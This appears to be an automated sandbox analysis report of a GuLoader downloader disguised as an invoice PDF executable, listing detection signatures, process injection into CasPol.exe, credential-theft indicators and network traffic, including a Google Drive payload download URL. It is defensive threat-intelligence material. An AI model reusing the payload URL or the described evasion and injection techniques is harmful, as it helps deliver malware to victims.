Edit tour

Windows Analysis Report
rFACTURA_FAC_2023_1-1000733.PDF.exe

Overview

General Information

Sample Name:	rFACTURA_FAC_2023_1-1000733.PDF.exe
Analysis ID:	830399
MD5:	a6ef5ed777ba7369c2bb28e46b198ba6
SHA1:	f707bc0343f41d95f57e776a9f85f6a2c5791aa7
SHA256:	878d710875b07ec61bef0b198ba67bf81ad0730a3a483d5762cd18e13fb4b525
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

May check the online IP address of the machine

Uses an obfuscated file name to hide its real file extension (double extension)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Enables debug privileges

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

rFACTURA_FAC_2023_1-1000733.PDF.exe (PID: 8312 cmdline: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe MD5: A6EF5ED777BA7369C2BB28E46B198BA6)

CasPol.exe (PID: 6576 cmdline: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WerFault.exe (PID: 8568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Snort Signatures

ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check - Source IP: 192.168.11.20 - Destination IP: 132.226.8.169

Timestamp:	192.168.11.20132.226.8.16949801802039190 03/20/23-11:06:12.385242
SID:	2039190
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Virustotal: Detection: 20%

Perma Link

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Replyingly\Avnbgen\Spisekamrenes

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49800 version: TLS 1.2

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: @cn.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb\| source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb)Q source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.0.dr
Source:	Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
Source:	Binary string: C:\Windows\caspol.pdbpdbpol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\exe\caspol.pdby33o source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\caspol.pdbd source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: ;6##.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDSrMV9 source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdbGhY source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbp source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: bwcaspol.PDB 8: source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\net6.0-Release\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?cnC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBFiV source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: System.pdbSystem.Core.dll source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: 3symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 96HPWn,C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
Source:	Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdbp source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596D
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_004065A2 FindFirstFileW,FindClose,	0_2_004065A2
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp 341978CCh	11_2_34196DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_34196933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_34196B14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_34196300

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.11.20:49801 -> 132.226.8.169:80

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Joe Sandbox View

ASN Name: UTMEMUS UTMEMUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-a8-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: CasPol.exe, 0000000B.00000002.1876903989.0000000034291000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#Notice
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: battery-level-90-charging-symbolic.svg.0.dr	String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003A94000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003AAA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: Amcache.hve.LOG1.15.dr, Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/#
Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/2
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/j
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08kQ
Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08ktsv
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.Primitives.dll.0.dr, System.Reflection.TypeExtensions.dll.0.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.TypeExtensions.dll.0.dr	String found in binary or memory: https://github.com/dotnet/runtimeBSJB

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-a8-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49800 version: TLS 1.2

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_00405402 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405402

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rFACTURA_FAC_2023_1-1000733.PDF.exe

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_00403350

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Code function: 0_2_00404C3F	0_2_00404C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_341934F2	11_2_341934F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_34196DDF	11_2_34196DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_34194858	11_2_34194858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_341920D8	11_2_341920D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_341962EF	11_2_341962EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_34196300	11_2_34196300

Source: System.Reflection.TypeExtensions.dll.0.dr

Static PE information: No import functions for PE file found

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: invalid certificate

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

File read: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Jump to behavior

Source: rFACTURA_FAC_2023_1-1000733.PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500
Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe	Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

0_2_00403350

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

File created: C:\Users\user\AppData\Local\Temp\nsz1C6D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/21@3/3

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004020FE

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe

Code function: 0_2_004046C3 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046C3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6576

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

